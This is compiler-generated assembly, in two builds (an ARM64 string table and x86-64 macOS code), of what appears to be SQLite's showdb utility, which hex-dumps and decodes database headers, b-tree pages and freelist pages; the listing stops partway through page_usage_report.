.asciz "args:\n dbheader Show database header\n pgidx Index of how each page is used\n ptrmap Show all PTRMAP page content\n NNN..MMM Show hex of pages NNN through MMM\n NNN..end Show hex of pages NNN through end of file\n NNNb Decode btree page NNN\n NNNbc Decode btree page NNN and show content\n NNNbm Decode btree page NNN and show a layout map\n NNNbdCCC Decode cell CCC on btree page NNN\n NNNt Decode freelist trunk page NNN\n NNNtd Show leaf freelist pages on the decode\n NNNtr Recursively decode freelist starting at NNN\n"
l_.str.12: ; @.str.12
.asciz "Page %d: (offsets 0x%x..0x%x)\n"
l_.str.13: ; @.str.13
.asciz " %03x: "
l_.str.14: ; @.str.14
.asciz " %04x: "
l_.str.15: ; @.str.15
.asciz " %05x: "
l_.str.16: ; @.str.16
.asciz " %06x: "
l_.str.17: ; @.str.17
.asciz " %08x: "
.section __DATA,__data
.p2align 2 ; @perLine
_perLine:
.long 16 ; 0x10
.section __TEXT,__cstring,cstring_literals
l_.str.18: ; @.str.18
.asciz " "
l_.str.19: ; @.str.19
.asciz "%02x "
l_.str.20: ; @.str.20
.asciz " "
l_.str.21: ; @.str.21
.asciz "%c"
l_.str.22: ; @.str.22
.asciz "\n"
l_.str.23: ; @.str.23
.asciz "Decoded:\n"
l_.str.24: ; @.str.24
.asciz "Database page size"
l_.str.25: ; @.str.25
.asciz "File format write version"
l_.str.26: ; @.str.26
.asciz "File format read version"
l_.str.27: ; @.str.27
.asciz "Reserved space at end of page"
l_.str.28: ; @.str.28
.asciz "File change counter"
l_.str.29: ; @.str.29
.asciz "Size of database in pages"
l_.str.30: ; @.str.30
.asciz "Page number of first freelist page"
l_.str.31: ; @.str.31
.asciz "Number of freelist pages"
l_.str.32: ; @.str.32
.asciz "Schema cookie"
l_.str.33: ; @.str.33
.asciz "Schema format version"
l_.str.34: ; @.str.34
.asciz "Default page cache size"
l_.str.35: ; @.str.35
.asciz "Largest auto-vac root page"
l_.str.36: ; @.str.36
.asciz "Text encoding"
l_.str.37: ; @.str.37
.asciz "User version"
l_.str.38: ; @.str.38
.asciz "Incremental-vacuum mode"
l_.str.39: ; @.str.39
.asciz "Application ID"
l_.str.40: ; @.str.40
.asciz "meta[8]"
l_.str.41: ; @.str.41
.asciz "meta[9]"
l_.str.42: ; @.str.42
.asciz "meta[10]"
l_.str.43: ; @.str.43
.asciz "meta[11]"
l_.str.44: ; @.str.44
.asciz "meta[12]"
l_.str.45: ; @.str.45
.asciz "Change counter for version number"
l_.str.46: ; @.str.46
.asciz "SQLite version number"
l_.str.47: ; @.str.47
.asciz " %03x: %02x"
l_.str.48: ; @.str.48
.asciz " %02x"
l_.str.49: ; @.str.49
.asciz " %9d"
l_.str.50: ; @.str.50
.asciz "%s %s\n"
l_.str.51: ; @.str.51
.asciz "empty database\n"
l_.str.52: ; @.str.52
.asciz "cannot open database: %s\n"
.zerofill __DATA,__bss,_zPageUse,8,3 ; @zPageUse
l_.str.53: ; @.str.53
.asciz "sqlite_master"
l_.str.54: ; @.str.54
.asciz "PRAGMA writable_schema=ON"
l_.str.55: ; @.str.55
.asciz "SELECT type, name, rootpage FROM SQLITE_MASTER WHERE rootpage ORDER BY rowid %s"
l_.str.56: ; @.str.56
.asciz "DESC"
l_.str.57: ; @.str.57
.space 1
l_.str.58: ; @.str.58
.asciz "ERROR: cannot query database: %s\n"
l_.str.59: ; @.str.59
.asciz "%5d: %s\n"
l_.str.60: ; @.str.60
.asciz "???"
l_.str.61: ; @.str.61
.asciz "Out of memory...\n"
l_.str.62: ; @.str.62
.asciz "freelist trunk #%d child of %d"
l_.str.63: ; @.str.63
.asciz "freelist leaf, child %d of trunk page %d"
l_.str.64: ; @.str.64
.asciz "ERROR: page %d out of range 1..%d: %s\n"
l_.str.65: ; @.str.65
.asciz "ERROR: page %d used multiple times:\n"
l_.str.66: ; @.str.66
.asciz "ERROR: previous: %s\n"
l_.str.67: ; @.str.67
.asciz "ERROR: current: %s\n"
l_.str.68: ; @.str.68
.asciz "PTRMAP page covering %d..%d"
l_.str.69: ; @.str.69
.asciz "corrupt node"
l_.str.70: ; @.str.70
.asciz "interior node of index"
l_.str.71: ; @.str.71
.asciz "interior node of table"
l_.str.72: ; @.str.72
.asciz "leaf of index"
l_.str.73: ; @.str.73
.asciz "leaf of table"
l_.str.74: ; @.str.74
.asciz "%s [%s], child %d of page %d"
l_.str.75: ; @.str.75
.asciz "root %s [%s]"
l_.str.76: ; @.str.76
.asciz "overflow %d from cell %d of page %d"
l_.str.77: ; @.str.77
.asciz "database does not use PTRMAP pages\n"
l_.str.78: ; @.str.78
.asciz "%5d: root of sqlite_master\n"
l_.str.79: ; @.str.79
.asciz "%5d: PTRMAP page covering %d..%d\n"
l_.str.80: ; @.str.80
.asciz "b-tree root page"
l_.str.81: ; @.str.81
.asciz "freelist page"
l_.str.82: ; @.str.82
.asciz "first page of overflow"
l_.str.83: ; @.str.83
.asciz "later page of overflow"
l_.str.84: ; @.str.84
.asciz "b-tree non-root page"
l_.str.85: ; @.str.85
.asciz "%5d: %s, parent=%u\n"
l_.str.86: ; @.str.86
.asciz "unknown"
l_.str.87: ; @.str.87
.asciz "index interior node"
l_.str.88: ; @.str.88
.asciz "table interior node"
l_.str.89: ; @.str.89
.asciz "index leaf"
l_.str.90: ; @.str.90
.asciz "table leaf"
l_.str.91: ; @.str.91
.asciz "Page %d has only %d cells\n"
l_.str.92: ; @.str.92
.asciz "Header on btree page %d:\n"
l_.str.93: ; @.str.93
.asciz "Offset to first freeblock"
l_.str.94: ; @.str.94
.asciz "Number of cells on this page"
l_.str.95: ; @.str.95
.asciz "Offset to cell content area"
l_.str.96: ; @.str.96
.asciz "Fragmented byte count"
l_.str.97: ; @.str.97
.asciz "Right child"
l_.str.98: ; @.str.98
.asciz " key: lx=left-child n=payload-size r=rowid\n"
l_.str.99: ; @.str.99
.asciz "%d"
l_.str.100: ; @.str.100
.asciz " %03x: cell[%d] %s\n"
l_.str.101: ; @.str.101
.asciz "Page map: (H=header P=cell-index 1=page-1-header .=free-space)\n"
l_.str.102: ; @.str.102
.asciz " %03x: %.64s\n"
.zerofill __DATA,__bss,_describeCell.zDesc,1000,0 ; @describeCell.zDesc
l_.str.103: ; @.str.103
.asciz "lx: %d "
l_.str.104: ; @.str.104
.asciz "n: %lld "
l_.str.105: ; @.str.105
.asciz "r: %lld "
l_.str.106: ; @.str.106
.asciz "ov: %d "
l_.str.107: ; @.str.107
.asciz "*"
l_.str.108: ; @.str.108
.asciz "%lld"
l_.str.109: ; @.str.109
.asciz "real"
l_.str.110: ; @.str.110
.asciz "0"
l_.str.111: ; @.str.111
.asciz "1"
l_.str.112: ; @.str.112
.asciz "blob(%lld)"
l_.str.113: ; @.str.113
.asciz "txt(%lld)"
l_.str.114: ; @.str.114
.asciz "Cell[%d]:\n"
l_.str.115: ; @.str.115
.asciz "left child page:: %d\n"
l_.str.116: ; @.str.116
.asciz "payload-size: %lld\n"
l_.str.117: ; @.str.117
.asciz "payload-size: %lld (%lld local, %lld overflow)\n"
l_.str.118: ; @.str.118
.asciz "rowid: %lld\n"
l_.str.119: ; @.str.119
.asciz "record-header-size: %d\n"
l_.str.120: ; @.str.120
.asciz "typecode[%d]: %d - "
l_.str.121: ; @.str.121
.asciz "NULL"
l_.str.122: ; @.str.122
.asciz "int8"
l_.str.123: ; @.str.123
.asciz "int16"
l_.str.124: ; @.str.124
.asciz "int24"
l_.str.125: ; @.str.125
.asciz "int32"
l_.str.126: ; @.str.126
.asciz "int48"
l_.str.127: ; @.str.127
.asciz "int64"
l_.str.128: ; @.str.128
.asciz "double"
l_.str.129: ; @.str.129
.asciz "zero"
l_.str.130: ; @.str.130
.asciz "one"
l_.str.131: ; @.str.131
.asciz "error"
l_.str.132: ; @.str.132
.asciz "blob(%d)"
l_.str.133: ; @.str.133
.asciz "text(%d)"
l_.str.134: ; @.str.134
.asciz "%s\n"
l_.str.135: ; @.str.135
.asciz "data[%d]: "
l_.str.136: ; @.str.136
.asciz "%#g\n"
l_.str.137: ; @.str.137
.asciz "%lld\n"
l_.str.138: ; @.str.138
.asciz "%02x"
l_.str.139: ; @.str.139
.asciz "...'"
l_.str.140: ; @.str.140
.asciz "'"
l_.str.141: ; @.str.141
.asciz "... %lld bytes of content ...\n"
l_.str.142: ; @.str.142
.asciz "overflow-page: %d\n"
l_.str.143: ; @.str.143
.asciz "Decode of freelist trunk page %d:\n"
l_.str.144: ; @.str.144
.asciz "Next freelist trunk page"
l_.str.145: ; @.str.145
.asciz "Number of entries on this page"
l_.str.146: ; @.str.146
.asciz "[%d]"
l_.str.147: ; @.str.147
.asciz " %5s %7u"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $240, %rsp
movl $0, -4(%rbp)
movl %edi, -8(%rbp)
movq %rsi, -16(%rbp)
cmpl $2, -8(%rbp)
jge LBB0_2
## %bb.1:
movq -16(%rbp), %rax
movq (%rax), %rdi
callq _usage
movl $1, %edi
callq _exit
LBB0_2:
movq -16(%rbp), %rax
movq 8(%rax), %rdi
xorl %esi, %esi
movb $0, %al
callq _open
movl %eax, _db(%rip)
cmpl $0, _db(%rip)
jge LBB0_4
## %bb.3:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
movq -16(%rbp), %rax
movq (%rax), %rdx
movq 8(%rax), %rcx
leaq L_.str(%rip), %rsi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
callq _fprintf
movl $1, %edi
callq _exit
LBB0_4:
movb $0, -162(%rbp)
movb $0, -161(%rbp)
movl _db(%rip), %edi
movl $16, %esi
xorl %edx, %edx
callq _lseek
movl _db(%rip), %edi
leaq -162(%rbp), %rsi
movl $2, %edx
callq _read
cmpq $2, %rax
jge LBB0_6
## %bb.5:
leaq -162(%rbp), %rdi
xorl %esi, %esi
movl $2, %edx
callq _memset
LBB0_6:
movzbl -162(%rbp), %eax
shll $8, %eax
movzbl -161(%rbp), %ecx
shll $16, %ecx
addl %ecx, %eax
movl %eax, _pagesize(%rip)
cmpl $0, _pagesize(%rip)
jne LBB0_8
## %bb.7:
movl $1024, _pagesize(%rip) ## imm = 0x400
LBB0_8:
movl _pagesize(%rip), %esi
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
movl _db(%rip), %edi
leaq -160(%rbp), %rsi
callq _fstat$INODE64
movq -64(%rbp), %rax
movslq _pagesize(%rip), %rcx
cqto
idivq %rcx
## kill: def $eax killed $eax killed $rax
movl %eax, _mxPage(%rip)
movl _mxPage(%rip), %esi
leaq L_.str.2(%rip), %rdi
movb $0, %al
callq _printf
cmpl $2, -8(%rbp)
jne LBB0_14
## %bb.9:
movl $1, -168(%rbp)
LBB0_10: ## =>This Inner Loop Header: Depth=1
movl -168(%rbp), %eax
cmpl _mxPage(%rip), %eax
jg LBB0_13
## %bb.11: ## in Loop: Header=BB0_10 Depth=1
movl -168(%rbp), %edi
callq _print_page
## %bb.12: ## in Loop: Header=BB0_10 Depth=1
movl -168(%rbp), %eax
addl $1, %eax
movl %eax, -168(%rbp)
jmp LBB0_10
LBB0_13:
jmp LBB0_64
LBB0_14:
movl $2, -172(%rbp)
LBB0_15: ## =>This Loop Header: Depth=1
## Child Loop BB0_42 Depth 2
## Child Loop BB0_59 Depth 2
movl -172(%rbp), %eax
cmpl -8(%rbp), %eax
jge LBB0_63
## %bb.16: ## in Loop: Header=BB0_15 Depth=1
movq -16(%rbp), %rax
movslq -172(%rbp), %rcx
movq (%rax,%rcx,8), %rdi
leaq L_.str.3(%rip), %rsi
callq _strcmp
cmpl $0, %eax
jne LBB0_18
## %bb.17: ## in Loop: Header=BB0_15 Depth=1
callq _print_db_header
jmp LBB0_62
LBB0_18: ## in Loop: Header=BB0_15 Depth=1
movq -16(%rbp), %rax
movslq -172(%rbp), %rcx
movq (%rax,%rcx,8), %rdi
leaq L_.str.4(%rip), %rsi
callq _strcmp
cmpl $0, %eax
jne LBB0_20
## %bb.19: ## in Loop: Header=BB0_15 Depth=1
movq -16(%rbp), %rax
movq 8(%rax), %rdi
callq _page_usage_report
jmp LBB0_62
LBB0_20: ## in Loop: Header=BB0_15 Depth=1
movq -16(%rbp), %rax
movslq -172(%rbp), %rcx
movq (%rax,%rcx,8), %rdi
leaq L_.str.5(%rip), %rsi
callq _strcmp
cmpl $0, %eax
jne LBB0_22
## %bb.21: ## in Loop: Header=BB0_15 Depth=1
movq -16(%rbp), %rax
movq 8(%rax), %rdi
callq _ptrmap_coverage_report
jmp LBB0_62
LBB0_22: ## in Loop: Header=BB0_15 Depth=1
movq -16(%rbp), %rax
movslq -172(%rbp), %rcx
movq (%rax,%rcx,8), %rdi
leaq L_.str.6(%rip), %rsi
callq _strcmp
cmpl $0, %eax
jne LBB0_24
## %bb.23: ## in Loop: Header=BB0_15 Depth=1
movq -16(%rbp), %rax
movq (%rax), %rdi
callq _usage
jmp LBB0_62
LBB0_24: ## in Loop: Header=BB0_15 Depth=1
movq -16(%rbp), %rax
movslq -172(%rbp), %rcx
movq (%rax,%rcx,8), %rax
movsbl (%rax), %edi
callq _isdigit
cmpl $0, %eax
jne LBB0_26
## %bb.25: ## in Loop: Header=BB0_15 Depth=1
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
movq -16(%rbp), %rax
movq (%rax), %rdx
movq -16(%rbp), %rax
movslq -172(%rbp), %rcx
movq (%rax,%rcx,8), %rcx
leaq L_.str.7(%rip), %rsi
movb $0, %al
callq _fprintf
jmp LBB0_62
LBB0_26: ## in Loop: Header=BB0_15 Depth=1
movq -16(%rbp), %rax
movslq -172(%rbp), %rcx
movq (%rax,%rcx,8), %rdi
leaq -192(%rbp), %rsi
xorl %edx, %edx
callq _strtol
## kill: def $eax killed $eax killed $rax
movl %eax, -176(%rbp)
cmpq $0, -192(%rbp)
je LBB0_29
## %bb.27: ## in Loop: Header=BB0_15 Depth=1
movq -192(%rbp), %rdi
leaq L_.str.8(%rip), %rsi
callq _strcmp
cmpl $0, %eax
jne LBB0_29
## %bb.28: ## in Loop: Header=BB0_15 Depth=1
movl _mxPage(%rip), %eax
movl %eax, -180(%rbp)
jmp LBB0_54
LBB0_29: ## in Loop: Header=BB0_15 Depth=1
cmpq $0, -192(%rbp)
je LBB0_33
## %bb.30: ## in Loop: Header=BB0_15 Depth=1
movq -192(%rbp), %rax
movsbl (%rax), %eax
cmpl $46, %eax
jne LBB0_33
## %bb.31: ## in Loop: Header=BB0_15 Depth=1
movq -192(%rbp), %rax
movsbl 1(%rax), %eax
cmpl $46, %eax
jne LBB0_33
## %bb.32: ## in Loop: Header=BB0_15 Depth=1
movq -192(%rbp), %rdi
addq $2, %rdi
xorl %eax, %eax
movl %eax, %esi
xorl %edx, %edx
callq _strtol
## kill: def $eax killed $eax killed $rax
movl %eax, -180(%rbp)
jmp LBB0_53
LBB0_33: ## in Loop: Header=BB0_15 Depth=1
cmpq $0, -192(%rbp)
je LBB0_39
## %bb.34: ## in Loop: Header=BB0_15 Depth=1
movq -192(%rbp), %rax
movsbl (%rax), %eax
cmpl $98, %eax
jne LBB0_39
## %bb.35: ## in Loop: Header=BB0_15 Depth=1
cmpl $1, -176(%rbp)
jne LBB0_37
## %bb.36: ## in Loop: Header=BB0_15 Depth=1
movl $100, -204(%rbp)
movl $100, -196(%rbp)
movl _pagesize(%rip), %eax
subl $100, %eax
movl %eax, -200(%rbp)
jmp LBB0_38
LBB0_37: ## in Loop: Header=BB0_15 Depth=1
movl $0, -204(%rbp)
movl -176(%rbp), %eax
subl $1, %eax
imull _pagesize(%rip), %eax
movl %eax, -196(%rbp)
movl _pagesize(%rip), %eax
movl %eax, -200(%rbp)
LBB0_38: ## in Loop: Header=BB0_15 Depth=1
movl -196(%rbp), %edi
movl -200(%rbp), %esi
callq _getContent
movq %rax, -216(%rbp)
movq -216(%rbp), %rdi
movl -176(%rbp), %esi
movl -204(%rbp), %edx
movq -192(%rbp), %rcx
addq $1, %rcx
callq _decode_btree_page
movq -216(%rbp), %rdi
callq _free
jmp LBB0_62
LBB0_39: ## in Loop: Header=BB0_15 Depth=1
cmpq $0, -192(%rbp)
je LBB0_50
## %bb.40: ## in Loop: Header=BB0_15 Depth=1
movq -192(%rbp), %rax
movsbl (%rax), %eax
cmpl $116, %eax
jne LBB0_50
## %bb.41: ## in Loop: Header=BB0_15 Depth=1
movl $0, -220(%rbp)
movl $0, -224(%rbp)
movl $1, -228(%rbp)
LBB0_42: ## Parent Loop BB0_15 Depth=1
## => This Inner Loop Header: Depth=2
movq -192(%rbp), %rax
movslq -228(%rbp), %rcx
cmpb $0, (%rax,%rcx)
je LBB0_49
## %bb.43: ## in Loop: Header=BB0_42 Depth=2
movq -192(%rbp), %rax
movslq -228(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $114, %eax
jne LBB0_45
## %bb.44: ## in Loop: Header=BB0_42 Depth=2
movl $1, -224(%rbp)
LBB0_45: ## in Loop: Header=BB0_42 Depth=2
movq -192(%rbp), %rax
movslq -228(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $100, %eax
jne LBB0_47
## %bb.46: ## in Loop: Header=BB0_42 Depth=2
movl $1, -220(%rbp)
LBB0_47: ## in Loop: Header=BB0_42 Depth=2
jmp LBB0_48
LBB0_48: ## in Loop: Header=BB0_42 Depth=2
movl -228(%rbp), %eax
addl $1, %eax
movl %eax, -228(%rbp)
jmp LBB0_42
LBB0_49: ## in Loop: Header=BB0_15 Depth=1
movl -176(%rbp), %edi
movl _pagesize(%rip), %esi
movl -220(%rbp), %edx
movl -224(%rbp), %ecx
callq _decode_trunk_page
jmp LBB0_62
LBB0_50: ## in Loop: Header=BB0_15 Depth=1
movl -176(%rbp), %eax
movl %eax, -180(%rbp)
## %bb.51: ## in Loop: Header=BB0_15 Depth=1
jmp LBB0_52
LBB0_52: ## in Loop: Header=BB0_15 Depth=1
jmp LBB0_53
LBB0_53: ## in Loop: Header=BB0_15 Depth=1
jmp LBB0_54
LBB0_54: ## in Loop: Header=BB0_15 Depth=1
cmpl $1, -176(%rbp)
jl LBB0_57
## %bb.55: ## in Loop: Header=BB0_15 Depth=1
movl -180(%rbp), %eax
cmpl -176(%rbp), %eax
jl LBB0_57
## %bb.56: ## in Loop: Header=BB0_15 Depth=1
movl -180(%rbp), %eax
cmpl _mxPage(%rip), %eax
jle LBB0_58
LBB0_57:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
movl _mxPage(%rip), %edx
leaq L_.str.9(%rip), %rsi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
callq _fprintf
movl $1, %edi
callq _exit
LBB0_58: ## in Loop: Header=BB0_15 Depth=1
jmp LBB0_59
LBB0_59: ## Parent Loop BB0_15 Depth=1
## => This Inner Loop Header: Depth=2
movl -176(%rbp), %eax
cmpl -180(%rbp), %eax
jg LBB0_61
## %bb.60: ## in Loop: Header=BB0_59 Depth=2
movl -176(%rbp), %edi
callq _print_page
movl -176(%rbp), %eax
addl $1, %eax
movl %eax, -176(%rbp)
jmp LBB0_59
LBB0_61: ## in Loop: Header=BB0_15 Depth=1
jmp LBB0_62
LBB0_62: ## in Loop: Header=BB0_15 Depth=1
movl -172(%rbp), %eax
addl $1, %eax
movl %eax, -172(%rbp)
jmp LBB0_15
LBB0_63:
jmp LBB0_64
LBB0_64:
movl _db(%rip), %edi
callq _close
xorl %eax, %eax
addq $240, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function usage
_usage: ## @usage
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movq %rdi, -8(%rbp)
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
movq -8(%rbp), %rdx
leaq L_.str.10(%rip), %rsi
movb $0, %al
callq _fprintf
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
leaq L_.str.11(%rip), %rsi
movb $0, %al
callq _fprintf
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function print_page
_print_page: ## @print_page
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl %edi, -4(%rbp)
movl -4(%rbp), %eax
subl $1, %eax
imull _pagesize(%rip), %eax
movl %eax, -8(%rbp)
movq ___stdoutp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
movl -4(%rbp), %edx
movl -8(%rbp), %ecx
movl -8(%rbp), %r8d
addl _pagesize(%rip), %r8d
subl $1, %r8d
leaq L_.str.12(%rip), %rsi
movb $0, %al
callq _fprintf
movl -8(%rbp), %edi
movl _pagesize(%rip), %esi
xorl %edx, %edx
callq _print_byte_range
movq %rax, -16(%rbp)
movq -16(%rbp), %rdi
callq _free
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function print_db_header
_print_db_header: ## @print_db_header
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
xorl %edx, %edx
movl $100, %esi
movl %edx, %edi
callq _print_byte_range
movq %rax, -8(%rbp)
leaq L_.str.23(%rip), %rdi
movb $0, %al
callq _printf
movq -8(%rbp), %rdi
movl $16, %esi
movl $2, %edx
leaq L_.str.24(%rip), %rcx
callq _print_decode_line
movq -8(%rbp), %rdi
movl $18, %esi
movl $1, %edx
leaq L_.str.25(%rip), %rcx
callq _print_decode_line
movq -8(%rbp), %rdi
movl $19, %esi
movl $1, %edx
leaq L_.str.26(%rip), %rcx
callq _print_decode_line
movq -8(%rbp), %rdi
movl $20, %esi
movl $1, %edx
leaq L_.str.27(%rip), %rcx
callq _print_decode_line
movq -8(%rbp), %rdi
movl $24, %esi
movl $4, %edx
leaq L_.str.28(%rip), %rcx
callq _print_decode_line
movq -8(%rbp), %rdi
movl $28, %esi
movl $4, %edx
leaq L_.str.29(%rip), %rcx
callq _print_decode_line
movq -8(%rbp), %rdi
movl $32, %esi
movl $4, %edx
leaq L_.str.30(%rip), %rcx
callq _print_decode_line
movq -8(%rbp), %rdi
movl $36, %esi
movl $4, %edx
leaq L_.str.31(%rip), %rcx
callq _print_decode_line
movq -8(%rbp), %rdi
movl $40, %esi
movl $4, %edx
leaq L_.str.32(%rip), %rcx
callq _print_decode_line
movq -8(%rbp), %rdi
movl $44, %esi
movl $4, %edx
leaq L_.str.33(%rip), %rcx
callq _print_decode_line
movq -8(%rbp), %rdi
movl $48, %esi
movl $4, %edx
leaq L_.str.34(%rip), %rcx
callq _print_decode_line
movq -8(%rbp), %rdi
movl $52, %esi
movl $4, %edx
leaq L_.str.35(%rip), %rcx
callq _print_decode_line
movq -8(%rbp), %rdi
movl $56, %esi
movl $4, %edx
leaq L_.str.36(%rip), %rcx
callq _print_decode_line
movq -8(%rbp), %rdi
movl $60, %esi
movl $4, %edx
leaq L_.str.37(%rip), %rcx
callq _print_decode_line
movq -8(%rbp), %rdi
movl $64, %esi
movl $4, %edx
leaq L_.str.38(%rip), %rcx
callq _print_decode_line
movq -8(%rbp), %rdi
movl $68, %esi
movl $4, %edx
leaq L_.str.39(%rip), %rcx
callq _print_decode_line
movq -8(%rbp), %rdi
movl $72, %esi
movl $4, %edx
leaq L_.str.40(%rip), %rcx
callq _print_decode_line
movq -8(%rbp), %rdi
movl $76, %esi
movl $4, %edx
leaq L_.str.41(%rip), %rcx
callq _print_decode_line
movq -8(%rbp), %rdi
movl $80, %esi
movl $4, %edx
leaq L_.str.42(%rip), %rcx
callq _print_decode_line
movq -8(%rbp), %rdi
movl $84, %esi
movl $4, %edx
leaq L_.str.43(%rip), %rcx
callq _print_decode_line
movq -8(%rbp), %rdi
movl $88, %esi
movl $4, %edx
leaq L_.str.44(%rip), %rcx
callq _print_decode_line
movq -8(%rbp), %rdi
movl $92, %esi
movl $4, %edx
leaq L_.str.45(%rip), %rcx
callq _print_decode_line
movq -8(%rbp), %rdi
movl $96, %esi
movl $4, %edx
leaq L_.str.46(%rip), %rcx
callq _print_decode_line
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function page_usage_report
_page_usage_report: ## @page_usage_report
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $288, %rsp ## imm = 0x120
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movq %rdi, -216(%rbp)
cmpl $1, _mxPage(%rip)
jge LBB4_2
## %bb.1:
leaq L_.str.51(%rip), %rdi
movb $0, %al
callq _printf
jmp LBB4_26
LBB4_2:
movq -216(%rbp), %rdi
leaq -240(%rbp), %rsi
callq _sqlite3_open
movl %eax, -228(%rbp)
cmpl $0, -228(%rbp)
je LBB4_4
## %bb.3:
movq -240(%rbp), %rdi
callq _sqlite3_errmsg
movq %rax, %rsi
leaq L_.str.52(%rip), %rdi
movb $0, %al
callq _printf
movq -240(%rbp), %rdi
callq _sqlite3_close
jmp LBB4_26
LBB4_4:
movl _mxPage(%rip), %eax
addl $1, %eax
cltq
shlq $3, %rax
movl %eax, %edi
callq _sqlite3_malloc
movq %rax, _zPageUse(%rip)
cmpq $0, _zPageUse(%rip)
jne LBB4_6
## %bb.5:
callq _out_of_memory
LBB4_6:
movq _zPageUse(%rip), %rdi
movl _mxPage(%rip), %eax
addl $1, %eax
movslq %eax, %rdx
shlq $3, %rdx
xorl %esi, %esi
movq $-1, %rcx
callq ___memset_chk
xorl %edi, %edi
movl $100, %esi
callq _getContent
movq %rax, -256(%rbp)
movq -256(%rbp), %rdi
addq $32, %rdi
callq _decodeInt32
movl %eax, %edi
callq _page_usage_freelist
movq -256(%rbp), %rdi
callq _page_usage_ptrmap
movq -256(%rbp), %rdi
callq _free
movl $1, %edi
xorl %edx, %edx
leaq L_.str.53(%rip), %rcx
movl %edx, %esi
callq _page_usage_btree
movq -240(%rbp), %rdi
leaq L_.str.54(%rip), %rsi
xorl %eax, %eax
movl %eax, %r8d
movq %r8, %rdx
movq %r8, %rcx
callq _sqlite3_exec
movl $0, -224(%rbp)
LBB4_7: ## =>This Loop Header: Depth=1
## Child Loop BB4_10 Depth 2
cmpl $2, -224(%rbp)
jge LBB4_18
## %bb.8: ## in Loop: Header=BB4_7 Depth=1
leaq -208(%rbp), %rsi
movl -224(%rbp), %edx
leaq L_.str.57(%rip), %rcx
leaq L_.str.56(%rip), %rax
cmpl $0, %edx
cmovneq %rax, %rcx
movl $200, %edi
leaq L_.str.55(%rip), %rdx
movb $0, %al
callq _sqlite3_snprintf
movq -240(%rbp), %rdi
leaq -208(%rbp), %rsi
movl $4294967295, %edx ## imm = 0xFFFFFFFF
leaq -248(%rbp), %rcx
xorl %eax, %eax
movl %eax, %r8d
callq _sqlite3_prepare_v2
movl %eax, -228(%rbp)
cmpl $0, -228(%rbp)
jne LBB4_13
## %bb.9: ## in Loop: Header=BB4_7 Depth=1
jmp LBB4_10
LBB4_10: ## Parent Loop BB4_7 Depth=1
## => This Inner Loop Header: Depth=2
movq -248(%rbp), %rdi
callq _sqlite3_step
cmpl $100, %eax
jne LBB4_12
## %bb.11: ## in Loop: Header=BB4_10 Depth=2
movq -248(%rbp), %rdi
movl $2, %esi
callq _sqlite3_column_int
movl %eax, -260(%rbp)
movl -260(%rbp), %eax
movl %eax, -264(%rbp) ## 4-byte Spill
movq -248(%rbp), %rdi
movl $1, %esi
callq _sqlite3_column_text
movl -264(%rbp), %edi ## 4-byte Reload
movq %rax, %rcx
xorl %edx, %edx
movl %edx, %esi
callq _page_usage_btree
jmp LBB4_10
LBB4_12: ## in Loop: Header=BB4_7 Depth=1
jmp LBB4_14
LBB4_13: ## in Loop: Header=BB4_7 Depth=1
movq -240(%rbp), %rdi
callq _sqlite3_errmsg
movq %rax, %rsi
leaq L_.str.58(%rip), %rdi
movb $0, %al
callq _printf
LBB4_14: ## in Loop: Header=BB4_7 Depth=1
movq -248(%rbp), %rdi
callq _sqlite3_finalize
movl %eax, -228(%rbp)
cmpl $0, -228(%rbp)
jne LBB4_16
## %bb.15:
jmp LBB4_18
LBB4_16: ## in Loop: Header=BB4_7 Depth=1
jmp LBB4_17
LBB4_17: ## in Loop: Header=BB4_7 Depth=1
movl -224(%rbp), %eax
addl $1, %eax
movl %eax, -224(%rbp)
jmp LBB4_7
LBB4_18:
movq -240(%rbp), %rdi
callq _sqlite3_close
movl $1, -220(%rbp)
LBB4_19: ## =>This Inner Loop Header: Depth=1
movl -220(%rbp), %eax
cmpl _mxPage(%rip), %eax
jg LBB4_25
## %bb.20: ## in Loop: Header=BB4_19 Depth=1
movl -220(%rbp), %eax
movl %eax, -268(%rbp) ## 4-byte Spill
movq _zPageUse(%rip), %rax
movslq -220(%rbp), %rcx
cmpq $0, (%rax,%rcx,8)
je LBB4_22
## %bb.21: ## in Loop: Header=BB4_19 Depth=1
movq _zPageUse(%rip), %rax
movslq -220(%rbp), %rcx
movq (%rax,%rcx,8), %rax
movq %rax, -280(%rbp) ## 8-byte Spill
jmp LBB4_23
